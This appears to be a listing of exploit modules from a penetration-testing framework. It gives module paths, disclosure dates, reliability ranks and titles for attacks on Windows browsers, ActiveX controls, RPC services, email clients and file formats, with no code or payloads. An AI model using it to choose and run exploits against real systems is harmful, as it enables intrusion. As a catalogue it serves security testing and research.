   windows/browser/aim_goaway                                        2004-08-09       great      AOL Instant Messenger goaway Overflow
   windows/browser/aladdin_choosefilepath_bof                        2012-04-01       normal     Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow
   windows/browser/amaya_bdo                                         2009-01-28       normal     Amaya Browser v11.0 'bdo' Tag Overflow
   windows/browser/aol_ampx_convertfile                              2009-05-19       normal     AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow
   windows/browser/aol_icq_downloadagent                             2006-11-06       excellent  America Online ICQ ActiveX Control Arbitrary File Download and Execute
   windows/browser/apple_itunes_playlist                             2005-01-11       normal     Apple ITunes 4.7 Playlist Buffer Overflow
   windows/browser/apple_quicktime_marshaled_punk                    2010-08-30       great      Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
   windows/browser/apple_quicktime_mime_type                         2012-11-07       normal     Apple QuickTime 7.7.2 MIME Type Buffer Overflow
   windows/browser/apple_quicktime_rdrf                              2013-05-22       normal     Apple Quicktime 7 Invalid Atom Length Buffer Overflow
   windows/browser/apple_quicktime_rtsp                              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
   windows/browser/apple_quicktime_smil_debug                        2010-08-12       good       Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
   windows/browser/apple_quicktime_texml_font_table                  2012-11-07       normal     Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow
   windows/browser/ask_shortformat                                   2007-09-24       normal     Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
   windows/browser/asus_net4switch_ipswcom                           2012-02-17       normal     ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow
   windows/browser/athocgov_completeinstallation                     2008-02-15       normal     AtHocGov IWSAlerts ActiveX Control Buffer Overflow
   windows/browser/autodesk_idrop                                    2009-04-02       normal     Autodesk IDrop ActiveX Control Heap Memory Corruption
   windows/browser/aventail_epi_activex                              2010-08-19       normal     SonicWALL Aventail epi.dll AuthCredential Format String
   windows/browser/awingsoft_web3d_bof                               2009-07-10       average    AwingSoft Winds3D Player SceneURL Buffer Overflow
   windows/browser/awingsoft_winds3d_sceneurl                        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
   windows/browser/baofeng_storm_onbeforevideodownload               2009-04-30       normal     BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
   windows/browser/barcode_ax49                                      2007-06-22       normal     RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow
   windows/browser/blackice_downloadimagefileurl                     2008-06-05       excellent  Black Ice Cover Page ActiveX Control Arbitrary File Download
   windows/browser/c6_messenger_downloaderactivex                    2008-06-03       excellent  Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute
   windows/browser/ca_brightstor_addcolumn                           2008-03-16       normal     CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
   windows/browser/chilkat_crypt_writefile                           2008-11-03       excellent  Chilkat Crypt ActiveX WriteFile Unsafe Method
   windows/browser/cisco_anyconnect_exec                             2011-06-01       excellent  Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
   windows/browser/cisco_playerpt_setsource                          2012-03-22       normal     Cisco Linksys PlayerPT ActiveX Control Buffer Overflow
   windows/browser/cisco_playerpt_setsource_surl                     2012-07-17       normal     Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow
   windows/browser/cisco_webex_ext                                   2017-01-21       great      Cisco WebEx Chrome Extension RCE (CVE-2017-3823)
   windows/browser/citrix_gateway_actx                               2011-07-14       normal     Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability
   windows/browser/clear_quest_cqole                                 2012-05-19       normal     IBM Rational ClearQuest CQOle Remote Code Execution
   windows/browser/communicrypt_mail_activex                         2010-05-19       great      CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
   windows/browser/creative_software_cachefolder                     2008-05-28       normal     Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
   windows/browser/crystal_reports_printcontrol                      2010-12-14       normal     Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
   windows/browser/dell_webcam_crazytalk                             2012-03-19       normal     Dell Webcam CrazyTalk ActiveX BackImage Vulnerability
   windows/browser/dxstudio_player_exec                              2009-06-09       excellent  Worldweaver DX Studio Player shell.execute() Command Execution
   windows/browser/ea_checkrequirements                              2007-10-08       normal     Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
   windows/browser/ebook_flipviewer_fviewerloading                   2007-06-06       normal     FlipViewer FViewerLoading ActiveX Control Buffer Overflow
   windows/browser/enjoysapgui_comp_download                         2009-04-15       excellent  EnjoySAP SAP GUI ActiveX Control Arbitrary File Download
   windows/browser/enjoysapgui_preparetoposthtml                     2007-07-05       normal     EnjoySAP SAP GUI ActiveX Control Buffer Overflow
   windows/browser/facebook_extractiptc                              2008-01-31       normal     Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
   windows/browser/firefox_smil_uaf                                  2016-11-30       normal     Firefox nsSMILTimeContainer::NotifyTimeChange() RCE
   windows/browser/foxit_reader_plugin_url_bof                       2013-01-07       normal     Foxit Reader Plugin URL Processing Buffer Overflow
   windows/browser/getgodm_http_response_bof                         2014-03-09       normal     GetGo Download Manager HTTP Response Buffer Overflow
   windows/browser/gom_openurl                                       2007-10-27       normal     GOM Player ActiveX Control Buffer Overflow
   windows/browser/greendam_url                                      2009-06-11       normal     Green Dam URL Processing Buffer Overflow
   windows/browser/honeywell_hscremotedeploy_exec                    2013-02-22       excellent  Honeywell HSC Remote Deployer ActiveX Remote Code Execution
   windows/browser/honeywell_tema_exec                               2011-10-20       excellent  Honeywell Tema Remote Installer ActiveX Remote Code Execution
   windows/browser/hp_alm_xgo_setshapenodetype_exec                  2012-08-29       normal     HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution
   windows/browser/hp_easy_printer_care_xmlcachemgr                  2012-01-11       great      HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution
   windows/browser/hp_easy_printer_care_xmlsimpleaccessor            2011-08-16       great      HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution
   windows/browser/hp_loadrunner_addfile                             2008-01-25       normal     Persits XUpload ActiveX AddFile Buffer Overflow
   windows/browser/hp_loadrunner_addfolder                           2007-12-25       good       HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
   windows/browser/hp_loadrunner_writefilebinary                     2013-07-24       normal     HP LoadRunner lrFileIOService ActiveX Remote Code Execution
   windows/browser/hp_loadrunner_writefilestring                     2013-07-24       normal     HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution
   windows/browser/hpmqc_progcolor                                   2007-04-04       normal     HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
   windows/browser/hyleos_chemviewx_activex                          2010-02-10       good       Hyleos ChemView ActiveX Control Stack Buffer Overflow
   windows/browser/ibm_spss_c1sizer                                  2013-04-26       normal     IBM SPSS SamplePower C1Tab ActiveX Heap Overflow
   windows/browser/ibm_tivoli_pme_activex_bof                        2012-03-01       normal     IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow
   windows/browser/ibmegath_getxmlvalue                              2009-03-24       normal     IBM Access Support ActiveX Control Buffer Overflow
   windows/browser/ibmlotusdomino_dwa_uploadmodule                   2007-12-20       normal     IBM Lotus Domino Web Access Upload Module Buffer Overflow
   windows/browser/ie_cbutton_uaf                                    2012-12-27       normal     MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability
   windows/browser/ie_cgenericelement_uaf                            2013-05-03       good       MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
   windows/browser/ie_createobject                                   2006-04-11       excellent  MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution
   windows/browser/ie_execcommand_uaf                                2012-09-14       good       MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
   windows/browser/ie_iscomponentinstalled                           2006-02-24       normal     Microsoft Internet Explorer isComponentInstalled Overflow
   windows/browser/ie_setmousecapture_uaf                            2013-09-17       normal     MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free
   windows/browser/ie_unsafe_scripting                               2010-09-20       manual     Microsoft Internet Explorer Unsafe Scripting Misconfiguration
   windows/browser/imgeviewer_tifmergemultifiles                     2010-03-03       normal     Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
   windows/browser/indusoft_issymbol_internationalseparator          2012-04-28       normal     InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow
   windows/browser/inotes_dwa85w_bof                                 2012-06-01       normal     IBM Lotus iNotes dwa85W ActiveX Buffer Overflow
   windows/browser/intrust_annotatex_add                             2012-03-28       average    Quest InTrust Annotation Objects Uninitialized Pointer
   windows/browser/java_basicservice_impl                            2010-10-12       excellent  Sun Java Web Start BasicServiceImpl Code Execution
   windows/browser/java_cmm                                          2013-03-01       normal     Java CMM Remote Code Execution
   windows/browser/java_codebase_trust                               2011-02-15       excellent  Sun Java Applet2ClassLoader Remote Code Execution
   windows/browser/java_docbase_bof                                  2010-10-12       great      Sun Java Runtime New Plugin docbase Buffer Overflow
   windows/browser/java_mixer_sequencer                              2010-03-30       great      Java MixerSequencer Object GM_Song Structure Handling Vulnerability
   windows/browser/java_ws_arginject_altjvm                          2010-04-09       excellent  Sun Java Web Start Plugin Command Line Argument Injection
   windows/browser/java_ws_double_quote                              2012-10-16       excellent  Sun Java Web Start Double Quote Injection
   windows/browser/java_ws_vmargs                                    2012-02-14       excellent  Sun Java Web Start Plugin Command Line Argument Injection
   windows/browser/juniper_sslvpn_ive_setupdll                       2006-04-26       normal     Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow
   windows/browser/kazaa_altnet_heap                                 2007-10-03       normal     Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
   windows/browser/keyhelp_launchtripane_exec                        2012-06-26       excellent  KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
   windows/browser/logitechvideocall_start                           2007-05-31       normal     Logitech VideoCall ActiveX Control Buffer Overflow
   windows/browser/lpviewer_url                                      2008-10-06       normal     iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
   windows/browser/macrovision_downloadandexecute                    2007-10-31       normal     Macrovision InstallShield Update Service Buffer Overflow
   windows/browser/macrovision_unsafe                                2007-10-20       excellent  Macrovision InstallShield Update Service ActiveX Unsafe Method
   windows/browser/malwarebytes_update_exec                          2014-12-16       good       Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution
   windows/browser/maxthon_history_xcs                               2012-11-26       excellent  Maxthon3 about:history XCS Trusted Zone Code Execution
   windows/browser/mcafee_mcsubmgr_vsprintf                          2006-08-01       normal     McAfee Subscription Manager Stack Buffer Overflow
   windows/browser/mcafee_mvt_exec                                   2012-04-30       excellent  McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability
   windows/browser/mcafeevisualtrace_tracetarget                     2007-07-07       normal     McAfee Visual Trace ActiveX Control Buffer Overflow
   windows/browser/mirc_irc_url                                      2003-10-13       normal     mIRC IRC URL Buffer Overflow
   windows/browser/mozilla_attribchildremoved                        2011-12-06       average    Firefox 8/9 AttributeChildRemoved() Use-After-Free
   windows/browser/mozilla_firefox_onreadystatechange                2013-06-25       normal     Firefox onreadystatechange Event DocumentViewerImpl Use After Free
   windows/browser/mozilla_firefox_xmlserializer                     2013-01-08       normal     Firefox XMLSerializer Use After Free
   windows/browser/mozilla_interleaved_write                         2010-10-25       normal     Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
   windows/browser/mozilla_mchannel                                  2011-05-10       normal     Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
   windows/browser/mozilla_nssvgvalue                                2011-12-06       average    Firefox nsSVGValue Out-of-Bounds Access Vulnerability
   windows/browser/mozilla_nstreerange                               2011-02-02       normal     Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability
   windows/browser/mozilla_reduceright                               2011-06-21       normal     Mozilla Firefox Array.reduceRight() Integer Overflow
   windows/browser/ms03_020_ie_objecttype                            2003-06-04       normal     MS03-020 Microsoft Internet Explorer Object Type
   windows/browser/ms05_054_onload                                   2005-11-21       normal     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
   windows/browser/ms06_001_wmf_setabortproc                         2005-12-27       great      Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
   windows/browser/ms06_013_createtextrange                          2006-03-19       normal     MS06-013 Microsoft Internet Explorer createTextRange() Code Execution
   windows/browser/ms06_055_vml_method                               2006-09-19       normal     MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution
   windows/browser/ms06_057_webview_setslice                         2006-07-17       normal     MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow
   windows/browser/ms06_067_keyframe                                 2006-11-14       normal     MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
   windows/browser/ms06_071_xml_core                                 2006-10-10       normal     MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling
   windows/browser/ms07_017_ani_loadimage_chunksize                  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   windows/browser/ms08_041_snapshotviewer                           2008-07-07       excellent  Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
   windows/browser/ms08_053_mediaencoder                             2008-09-09       normal     Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
   windows/browser/ms08_070_visual_studio_msmask                     2008-08-13       normal     Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
   windows/browser/ms08_078_xml_corruption                           2008-12-07       normal     MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption
   windows/browser/ms09_002_memory_corruption                        2009-02-10       normal     MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
   windows/browser/ms09_043_owc_htmlurl                              2009-08-11       normal     Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
   windows/browser/ms09_043_owc_msdso                                2009-07-13       normal     Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
   windows/browser/ms09_072_style_object                             2009-11-20       normal     MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption
   windows/browser/ms10_002_aurora                                   2010-01-14       normal     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
   windows/browser/ms10_002_ie_object                                2010-01-21       normal     MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free
   windows/browser/ms10_018_ie_behaviors                             2010-03-09       good       MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   windows/browser/ms10_018_ie_tabular_activex                       2010-03-09       good       MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption
   windows/browser/ms10_022_ie_vbscript_winhlp32                     2010-02-26       great      MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
   windows/browser/ms10_026_avi_nsamplespersec                       2010-04-13       normal     MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
   windows/browser/ms10_042_helpctr_xss_cmd_exec                     2010-06-09       excellent  Microsoft Help Center XSS and Command Execution
   windows/browser/ms10_046_shortcut_icon_dllloader                  2010-07-16       excellent  Microsoft Windows Shell LNK Code Execution
   windows/browser/ms10_090_ie_css_clip                              2010-11-03       good       MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption
   windows/browser/ms11_003_ie_css_import                            2010-11-29       good       MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free
   windows/browser/ms11_050_mshtml_cobjectelement                    2011-06-16       normal     MS11-050 IE mshtml!CObjectElement Use After Free
   windows/browser/ms11_081_option                                   2012-10-11       normal     MS11-081 Microsoft Internet Explorer Option Element Use-After-Free
   windows/browser/ms11_093_ole32                                    2011-12-13       normal     MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
   windows/browser/ms12_004_midi                                     2012-01-10       normal     MS12-004 midiOutPlayNextPolyEvent Heap Overflow
   windows/browser/ms12_037_ie_colspan                               2012-06-12       normal     MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow
   windows/browser/ms12_037_same_id                                  2012-06-12       normal     MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
   windows/browser/ms13_009_ie_slayoutrun_uaf                        2013-02-13       average    MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free
   windows/browser/ms13_022_silverlight_script_object                2013-03-12       normal     MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access
   windows/browser/ms13_037_svg_dashstyle                            2013-03-06       normal     MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
   windows/browser/ms13_055_canchor                                  2013-07-09       normal     MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
   windows/browser/ms13_059_cflatmarkuppointer                       2013-06-27       normal     MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free
   windows/browser/ms13_069_caret                                    2013-09-10       normal     MS13-069 Microsoft Internet Explorer CCaret Use-After-Free
   windows/browser/ms13_080_cdisplaypointer                          2013-10-08       normal     MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
   windows/browser/ms13_090_cardspacesigninhelper                    2013-11-08       normal     MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow
   windows/browser/ms14_012_cmarkup_uaf                              2014-02-13       normal     MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free
   windows/browser/ms14_012_textrange                                2014-03-11       normal     MS14-012 Microsoft Internet Explorer TextRange Use-After-Free
   windows/browser/ms14_064_ole_code_execution                       2014-11-13       good       MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
   windows/browser/ms16_051_vbscript                                 2016-05-10       normal     Internet Explorer 11 VBScript Engine Memory Corruption
   windows/browser/msvidctl_mpeg2                                    2009-07-05       normal     Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
   windows/browser/mswhale_checkforupdates                           2009-04-15       normal     Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
   windows/browser/msxml_get_definition_code_exec                    2012-06-12       good       MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption
   windows/browser/nctaudiofile2_setformatlikesample                 2007-01-24       normal     NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
   windows/browser/nis2004_antispam                                  2004-03-19       normal     Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow
   windows/browser/nis2004_get                                       2007-05-16       normal     Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
   windows/browser/notes_handler_cmdinject                           2012-06-18       excellent  IBM Lotus Notes Client URL Handler Command Injection
   windows/browser/novell_groupwise_gwcls1_actvx                     2013-01-30       normal     Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution
   windows/browser/novelliprint_callbackurl                          2010-08-20       normal     Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
   windows/browser/novelliprint_datetime                             2009-12-08       great      Novell iPrint Client ActiveX Control Date/Time Buffer Overflow
   windows/browser/novelliprint_executerequest                       2008-02-22       normal     Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow
   windows/browser/novelliprint_executerequest_dbg                   2010-08-04       normal     Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow
   windows/browser/novelliprint_getdriversettings                    2008-06-16       normal     Novell iPrint Client ActiveX Control Buffer Overflow
   windows/browser/novelliprint_getdriversettings_2                  2010-11-15       normal     Novell iPrint Client ActiveX Control Buffer Overflow
   windows/browser/novelliprint_target_frame                         2009-12-08       great      Novell iPrint Client ActiveX Control target-frame Buffer Overflow
   windows/browser/ntr_activex_check_bof                             2012-01-11       normal     NTR ActiveX Control Check() Method Buffer Overflow
   windows/browser/ntr_activex_stopmodule                            2012-01-11       normal     NTR ActiveX Control StopModule() Remote Code Execution
   windows/browser/oracle_autovue_setmarkupmode                      2012-04-18       normal     Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow
   windows/browser/oracle_dc_submittoexpress                         2009-08-28       normal     Oracle Document Capture 10g ActiveX Control Buffer Overflow
   windows/browser/oracle_webcenter_checkoutandopen                  2013-04-16       excellent  Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
   windows/browser/orbit_connecting                                  2009-02-03       normal     Orbit Downloader Connecting Log Creation Buffer Overflow
   windows/browser/ovftool_format_string                             2012-11-08       normal     VMWare OVF Tools Format String Vulnerability
   windows/browser/pcvue_func                                        2011-10-05       average    PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability
   windows/browser/persits_xupload_traversal                         2009-09-29       excellent  Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   windows/browser/quickr_qp2_bof                                    2012-05-23       normal     IBM Lotus QuickR qp2 ActiveX Buffer Overflow
   windows/browser/real_arcade_installerdlg                          2011-04-03       normal     Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution
   windows/browser/realplayer_cdda_uri                               2010-11-15       normal     RealNetworks RealPlayer CDDA URI Initialization Vulnerability
   windows/browser/realplayer_console                                2008-03-08       normal     RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
   windows/browser/realplayer_import                                 2007-10-18       normal     RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
   windows/browser/realplayer_qcp                                    2011-08-16       average    RealNetworks Realplayer QCP Parsing Heap Overflow
   windows/browser/realplayer_smil                                   2005-03-01       normal     RealNetworks RealPlayer SMIL Buffer Overflow
   windows/browser/roxio_cineplayer                                  2007-04-11       normal     Roxio CinePlayer ActiveX Control Buffer Overflow
   windows/browser/safari_xslt_output                                2011-07-20       excellent  Apple Safari Webkit libxslt Arbitrary File Creation
   windows/browser/samsung_neti_wiewer_backuptoavi_bof               2012-04-21       normal     Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow
   windows/browser/samsung_security_manager_put                      2016-08-05       excellent  Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution
   windows/browser/sapgui_saveviewtosessionfile                      2009-03-31       normal     SAP AG SAPgui EAI WebViewer3D Buffer Overflow
   windows/browser/siemens_solid_edge_selistctrlx                    2013-05-26       normal     Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution
   windows/browser/softartisans_getdrivename                         2008-08-25       normal     SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
   windows/browser/sonicwall_addrouteentry                           2007-11-01       normal     SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
   windows/browser/symantec_altirisdeployment_downloadandinstall     2009-09-09       excellent  Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute
   windows/browser/symantec_altirisdeployment_runcmd                 2009-11-04       normal     Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow
   windows/browser/symantec_appstream_unsafe                         2009-01-15       excellent  Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute
   windows/browser/symantec_backupexec_pvcalendar                    2008-02-28       normal     Symantec BackupExec Calendar Control Buffer Overflow
   windows/browser/symantec_consoleutilities_browseandsavefile       2009-11-02       normal     Symantec ConsoleUtilities ActiveX Control Buffer Overflow
   windows/browser/synactis_connecttosynactis_bof                    2013-05-30       normal     Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
   windows/browser/systemrequirementslab_unsafe                      2008-10-16       excellent  Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
   windows/browser/teechart_pro                                      2011-08-11       normal     TeeChart Professional ActiveX Control Trusted Integer Dereference
   windows/browser/tom_sawyer_tsgetx71ex552                          2011-05-03       normal     Tom Sawyer Software GET Extension Factory Remote Code Execution
   windows/browser/trendmicro_extsetowner                            2010-08-25       normal     Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution
   windows/browser/trendmicro_officescan                             2007-02-12       normal     Trend Micro OfficeScan Client ActiveX Control Buffer Overflow
   windows/browser/tumbleweed_filetransfer                           2008-04-07       great      Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
   windows/browser/ubisoft_uplay_cmd_exec                            2012-07-29       normal     Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
   windows/browser/ultramjcam_openfiledig_bof                        2012-03-28       normal     TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow
   windows/browser/ultraoffice_httpupload                            2008-08-27       good       Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
   windows/browser/verypdf_pdfview                                   2008-06-16       normal     VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
   windows/browser/viscom_movieplayer_drawtext                       2010-01-12       normal     Viscom Software Movie Player Pro SDK ActiveX 6.8
   windows/browser/vlc_amv                                           2011-03-23       good       VLC AMV Dangling Pointer Vulnerability
   windows/browser/vlc_mms_bof                                       2012-03-15       normal     VLC MMS Stream Handling Buffer Overflow
   windows/browser/webdav_dll_hijacker                               2010-08-18       manual     WebDAV Application DLL Hijacker
   windows/browser/webex_ucf_newobject                               2008-08-06       good       WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
   windows/browser/wellintech_kingscada_kxclientdownload             2014-01-14       good       KingScada kxClientDownload.ocx ActiveX Remote Code Execution
   windows/browser/winamp_playlist_unc                               2006-01-29       great      Winamp Playlist UNC Path Computer Name Overflow
   windows/browser/winamp_ultravox                                   2008-01-18       normal     Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
   windows/browser/windvd7_applicationtype                           2007-03-20       normal     WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
   windows/browser/winzip_fileview                                   2007-11-02       normal     WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
   windows/browser/wmi_admintools                                    2010-12-21       great      Microsoft WMI Administration Tools ActiveX Buffer Overflow
   windows/browser/x360_video_player_set_text_bof                    2015-01-30       normal     X360 VideoPlayer ActiveX Control Buffer Overflow
   windows/browser/xmplay_asx                                        2006-11-21       good       XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
   windows/browser/yahoomessenger_fvcom                              2007-08-30       normal     Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
   windows/browser/yahoomessenger_server                             2007-06-05       good       Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
   windows/browser/zenturiprogramchecker_unsafe                      2007-05-29       excellent  Zenturi ProgramChecker ActiveX Control Arbitrary File Download
   windows/browser/zenworks_helplauncher_exec                        2011-10-19       normal     AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution
   windows/dcerpc/ms03_026_dcom                                      2003-07-16       great      MS03-026 Microsoft RPC DCOM Interface Overflow
   windows/dcerpc/ms05_017_msmq                                      2005-04-12       good       MS05-017 Microsoft Message Queueing Service Path Overflow
   windows/dcerpc/ms07_029_msdns_zonename                            2007-04-12       great      MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
   windows/dcerpc/ms07_065_msmq                                      2007-12-11       good       MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow
   windows/email/ms07_017_ani_loadimage_chunksize                    2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
   windows/email/ms10_045_outlook_ref_only                           2010-06-01       excellent  Outlook ATTACH_BY_REF_ONLY File Execution
   windows/email/ms10_045_outlook_ref_resolve                        2010-06-01       excellent  Outlook ATTACH_BY_REF_RESOLVE File Execution
   windows/emc/alphastor_agent                                       2008-05-27       great      EMC AlphaStor Agent Buffer Overflow
   windows/emc/alphastor_device_manager_exec                         2013-01-18       excellent  EMC AlphaStor Device Manager Opcode 0x75 Command Injection
   windows/emc/networker_format_string                               2012-08-29       normal     EMC Networker Format String
   windows/emc/replication_manager_exec                              2011-02-07       great      EMC Replication Manager Command Execution
   windows/fileformat/a_pdf_wav_to_mp3                               2010-08-17       normal     A-PDF WAV to MP3 v1.0.0 Buffer Overflow
   windows/fileformat/abbs_amp_lst                                   2013-06-30       normal     ABBS Audio Media Player .LST Buffer Overflow
   windows/fileformat/acdsee_fotoslate_string                        2011-09-12       good       ACDSee FotoSlate PLP File id Parameter Overflow
   windows/fileformat/acdsee_xpm                                     2007-11-23       good       ACDSee XPM File Section Buffer Overflow
   windows/fileformat/actfax_import_users_bof                        2012-08-28       normal     ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow
   windows/fileformat/activepdf_webgrabber                           2008-08-26       low        activePDF WebGrabber ActiveX Control Buffer Overflow
   windows/fileformat/adobe_collectemailinfo                         2008-02-08       good       Adobe Collab.collectEmailInfo() Buffer Overflow
   windows/fileformat/adobe_cooltype_sing                            2010-09-07       great      Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   windows/fileformat/adobe_flashplayer_button                       2010-10-28       normal     Adobe Flash Player "Button" Remote Code Execution
   windows/fileformat/adobe_flashplayer_newfunction                  2010-06-04       normal     Adobe Flash Player "newfunction" Invalid Pointer Use
   windows/fileformat/adobe_flatedecode_predictor02                  2009-10-08       good       Adobe FlateDecode Stream Predictor 02 Integer Overflow
   windows/fileformat/adobe_geticon                                  2009-03-24       good       Adobe Collab.getIcon() Buffer Overflow
   windows/fileformat/adobe_illustrator_v14_eps                      2009-12-03       great      Adobe Illustrator CS4 v14.0.0
   windows/fileformat/adobe_jbig2decode                              2009-02-19       good       Adobe JBIG2Decode Memory Corruption
